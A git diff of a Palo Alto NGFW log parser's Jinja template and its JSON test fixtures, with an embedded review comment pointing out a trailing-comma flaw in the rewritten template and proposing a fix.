++++ .../tests/test_system_event_3_json.json | 4 ++++ .../tests/test_system_event_4_json.json | 4 ++++ .../tests/test_system_event_5_json.json | 4 ++++ .../tests/test_system_event_6_json.json | 4 ++++ .../tests/test_system_event_7_json.json | 4 ++++ .../tests/test_system_event_8_json.json | 4 ++++ .../tests/test_system_event_9_json.json | 4 ++++ .../paloalto-ngfw/tests/test_threat.json | 5 ++++ .../paloalto-ngfw/tests/test_threat_02.json | 5 ++++ .../tests/test_timestamp_palo.json | 5 ++++ .../tests/test_traffic_event_1_json.json | 8 ++++++- .../tests/test_traffic_event_2_json.json | 8 ++++++- .../tests/test_update_content_json.json | 4 ++++ .../tests/test_upgrade_package_json.json | 4 ++++ .../tests/test_user_authentication_json.json | 4 ++++ .../paloalto-ngfw/tests/test_userid.json | 9 +++++++- .../tests/test_web_authentication_json.json | 4 ++++ .../tests/test_wildfire_failure_json.json | 4 ++++ .../paloalto-ngfw/tests/threat-url-xff.json | 6 +++++ .../paloalto-ngfw/tests/threat_cef.json | 18 +++++++++++++++ .../paloalto-ngfw/tests/threat_csv.json | 5 ++++ .../paloalto-ngfw/tests/traffic1_csv.json | 6 +++++ .../paloalto-ngfw/tests/traffic2_csv.json | 6 +++++ .../paloalto-ngfw/tests/traffic_cef.json | 23 +++++++++++++++++++ .../tests/traffic_with_resotimestamp.json | 3 ++- .../paloalto-ngfw/tests/udp_deny_csv.json | 3 ++- .../paloalto-ngfw/tests/url_cef.json | 19 +++++++++++++++ .../paloalto-ngfw/tests/userid_cef.json | 4 ++++ .../paloalto-ngfw/tests/wildfire1_json.json | 5 ++++ 68 files changed, 353 insertions(+), 25 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 79a12ce3b..835674257 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
@@ -717,16 +717,14 @@ stages: user_agent.os.version: "{{parsed_event.message.ClientOSVersion}}" user.name: "{{parsed_event.message.User or parsed_event.message.suser or parsed_event.message.PanOSSourceUserName or parsed_description.message.user}}" paloalto: >- - { - {% set ns = namespace(first_iteration=True) %} - {% for key, value in parsed_event.message.items() %} - {% if value not in ["null", "", None] %} - {% if not ns.first_iteration %},{% endif %} - {{key|tojson}}: {{(value | replace('\x00', ''))|tojson}} - {% set ns.first_iteration = false %} - {% endif %} - {% endfor %} + { + {%- for key, value in parsed_event.message.items() -%} + {%- if value not in ["null", "", None] -%} + {{key|tojson}}: {{(value | replace('\x00', ''))|tojson}}, + {%- endif -%} + {%- endfor -%} } + paloalto.Threat_ContentType: "{{parsed_event.message.Subtype}}" paloalto.connection.stage: "{{parsed_event.message.Stage or parsed_event.message.PanOSStage}}" paloalto.authentication.method: "{{parsed_event.message.AuthMethod or parsed_event.message.PanOSAuthMethod}}" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json index dba765bd4..08c69d61f 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json @@ -30,7 +30,14 @@ "serial_number": "016401002222" }, "paloalto": { - "Threat_ContentType": "login" + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "0", + "Threat_ContentType": "login", + "VirtualLocation": "vsys", + "VirtualSystemID": "1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json index 63c79e671..539963216 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json 
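Review bot: The rewritten `paloalto` template emits `{{key|tojson}}: {{...|tojson}},` for every kept pair with no last-element guard, so the rendered object always ends in `..., }`, a trailing comma that strict RFC 8259 parsers reject; the fixtures added in this same commit suggest the engine evaluates the template output leniently, but that is an implementation detail the parser is now relying on. `loop.last` is not a fix either, because the `value not in ["null", "", None]` filter can skip the final entry and leave the comma in place. A robust form accumulates the kept pairs into a dict and serialises once with `tojson`, which also yields `{}` for an all-empty message. Separately, the catch-all now re-emits raw keys that dedicated actions already normalise (the fixtures show `PanOSEndpointSerialNumber` next to `endpoint.serial_number`), so an exclusion set for keys mapped elsewhere would keep documents from carrying the same value twice.
```yaml
          paloalto: >-
            {%- set kept = {} -%}
            {%- for key, value in parsed_event.message.items() -%}
              {%- if value not in ["null", "", None] -%}
                {%- set _ = kept.update({key: (value | replace('\x00', ''))}) -%}
              {%- endif -%}
            {%- endfor -%}
            {{ kept | tojson }}
          # … unchanged: paloalto.Threat_ContentType and following set actions …
```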
@@ -30,7 +30,14 @@ "serial_number": "01640103000" }, "paloalto": { - "Threat_ContentType": "login" + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "0", + "Threat_ContentType": "login", + "VirtualLocation": "vsys", + "VirtualSystemID": "1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json index 1b4a52135..ff12d8db6 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json @@ -57,6 +57,13 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "PanOSSourceDeviceHost": "src_host_list-0", + "PanOSSourceDeviceModel": "src_model_list-1", + "PanOSSourceDeviceProfile": "src_profile_list-1", + "PanOSSourceDeviceVendor": "src_vendor_list-1", + "VirtualLocation": "vsys1" + }, "related": { "hosts": [ "xxxxx" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json index e213912c2..1a4fba4b4 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json @@ -61,6 +61,9 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "VirtualLocation": "vsys1" + }, "related": { "ip": [ "1.1.1.1" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json index 965583ed3..2da36f33e 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json @@ -65,6 +65,10 @@ }, "paloalto": { "DirectionOfAttack": "client to server", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSSourceLocation": "1.1.1.1-1.1.1.1", + "URLCategory": "any", + "VirtualLocation": "smtp", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json index 4dadbb51b..512ae89e7 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json @@ -52,7 +52,8 @@ "serial_number": "001701003551" }, "paloalto": { - "Threat_ContentType": "end" + "Threat_ContentType": "end", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json index 4863396f8..add589697 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json @@ -52,7 +52,8 @@ "serial_number": "001701003551" }, "paloalto": { - "Threat_ContentType": "end" + "Threat_ContentType": "end", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json index 09505692f..4fd7b8802 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json @@ -42,6 +42,7 @@ "version": "2.0" }, "paloalto": { + "PanOSQuarantineReason": "Malicious Traffic", "authentication": { "method": "RADIUS" }, diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json index 0c72fdb63..65f2b6940 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json @@ -34,7 +34,9 @@ "serial_number": "ABCDEFG" }, "paloalto": { + "EventID": "gw-auth", "Threat_ContentType": "0", + "VirtualLocation": "vsys1", "connection": { "stage": "login" } 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json index 2f8cb93ae..e4b1d5fab 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json @@ -34,7 +34,9 @@ "serial_number": "DFN3535D" }, "paloalto": { + "EventID": "gateway-config-release", "Threat_ContentType": "0", + "VirtualLocation": "vsys1", "connection": { "stage": "configuration" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json index 966ea0b88..6a0a99b82 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json @@ -40,6 +40,9 @@ "version": "2.0" }, "paloalto": { + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json index 6e8e88e79..e4e153224 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json @@ -49,7 +49,8 @@ "serial_number": "1801017000" }, "paloalto": { - "Threat_ContentType": "start" + "Threat_ContentType": "start", + "VirtualLocation": "vsys" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json index 4eef50d9d..9d2db872a 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json @@ -39,6 +39,10 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "VirtualLocation": "vsys1", + "VirtualSystemID": "1" + }, "related": { "hosts": [ "PA-VM" 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json index a6c93b2c4..d14918dab 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json @@ -58,8 +58,14 @@ "serial_number": "000011111112222" }, "paloalto": { + "DGHierarchyLevel1": "982", + "DGHierarchyLevel2": "117", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "client to server", - "Threat_ContentType": "url" + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" }, "related": { "hosts": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json index 6fd2dbfa0..e8c257c69 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json @@ -63,8 +63,15 @@ "serial_number": "no-serial" }, "paloalto": { + "ContentType": "text/plain", + "DGHierarchyLevel1": "463", + "DGHierarchyLevel2": "525", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "client to server", - "Threat_ContentType": "url" + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" }, "related": { "hosts": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json index ff9edc877..717e963a0 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json @@ -57,6 +57,10 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "PanOSSourceLocation": "US", + "VirtualLocation": "vsys1" + }, "related": { "hosts": [ "PA-5220" 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json index ab8aae097..3e52f494c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json @@ -30,6 +30,11 @@ "serial_number": "11111114444" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "auth-success", "Threat_ContentType": "auth" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json index 49c1758ab..eb10d6148 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json @@ -49,7 +49,8 @@ "serial_number": "1801016000" }, "paloalto": { - "Threat_ContentType": "start" + "Threat_ContentType": "start", + "VirtualLocation": "vsys1234" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json index c4c2b4c70..3af5d5428 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json @@ -37,6 +37,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "url-filtering" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json index 17ae8dd31..5e1cc96a9 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json 
@@ -37,6 +37,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "dhcp" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json index 72af37535..f4541dcbf 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json @@ -29,6 +29,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "dnsproxy" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index ee2f64323..3142ed671 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -60,8 +60,14 @@ "serial_number": "no-serial" }, "paloalto": { + "DGHierarchyLevel1": "463", + "DGHierarchyLevel2": "467", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "server to client", - "Threat_ContentType": "file" + "Threat_ContentType": "file", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json index aa4388311..f08a677ef 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json @@ -37,7 +37,9 @@ "serial_number": "PF000000" }, "paloalto": { + "EventID": "gateway-switch-to-ssl", "Threat_ContentType": "0", + "VirtualLocation": "vsys1", "connection": { "stage": "tunnel" } 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json index ed54db08a..bbf2d4e97 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json @@ -33,6 +33,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json index 6ba2ed95f..aab8fbd6b 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json @@ -51,7 +51,12 @@ "serial_number": "012001002253" }, "paloalto": { + "DGHierarchyLevel1": "24", + "DGHierarchyLevel2": "315", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "vulnerability", + "VirtualLocation": "vsys1", "threat": { "id": "40005", "name": "LDAP: User Login Brute Force Attempt" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json index f5f961342..610ab7c24 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json @@ -73,8 +73,14 @@ "serial_number": "007954000XXXXXX" }, "paloalto": { + "DGHierarchyLevel1": "999", + "DGHierarchyLevel2": "1111", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "server to client", - "Threat_ContentType": "file" + "Threat_ContentType": "file", + "URLCategory": "business-and-economy", + "VirtualLocation": "vsys1" }, "related": { "ip": [ 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json index 501fb4be5..25db7ff0a 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json @@ -38,7 +38,12 @@ "version": "0.0.-1" }, "paloalto": { + "DGHierarchyLevel1": "556", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "globalprotect", + "VirtualSystemID": "1", "connection": { "stage": "logout" }, diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json index 80edd7cf5..c3d742b70 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json @@ -62,8 +62,13 @@ "serial_number": "007954000370000" }, "paloalto": { + "DGHierarchyLevel1": "997", + "DGHierarchyLevel2": "1169", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "client to server", "Threat_ContentType": "vulnerability", + "VirtualLocation": "vsys1", "threat": { "category": "brute-force", "id": "SSH User Authentication Brute Force Attempt(40015)" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json index 6a5a4358f..b4a75c57c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json 
@@ -64,8 +64,14 @@ "serial_number": "00795400037XXXX" }, "paloalto": { + "DGHierarchyLevel1": "997", + "DGHierarchyLevel2": "1169", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "client to server", - "Threat_ContentType": "url" + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" }, "related": { "hosts": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json index 1ad423127..a470b3176 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json @@ -32,6 +32,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "ntpd" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json index ed9754708..af31efa35 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json @@ -36,6 +36,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "port" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json index 76aeaa4ce..c9ebd467e 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json @@ -36,6 +36,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "fb" }, "related": { 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json index c773195d0..2d21571e0 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json @@ -30,6 +30,11 @@ "serial_number": "016201000000" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "test-event", "Threat_ContentType": "vpn" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json index 70c358caf..8a299b691 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json @@ -34,6 +34,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json index b481b6c39..4b7dc612f 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "url-filtering" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json index 989c8393e..7901b05ce 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json 
@@ -37,6 +37,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "dhcp" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json index a92e1d91b..30a9a9970 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json @@ -33,6 +33,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json index c546509c6..f74ff5a47 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json index 452b9d6bb..8c122fc65 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json @@ -29,6 +29,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json index 4b2a51b0f..524aef010 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json index 36807c11d..f305c2d3e 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json index a83bce94f..63f3bd258 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json index 548954584..a00e82987 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json 
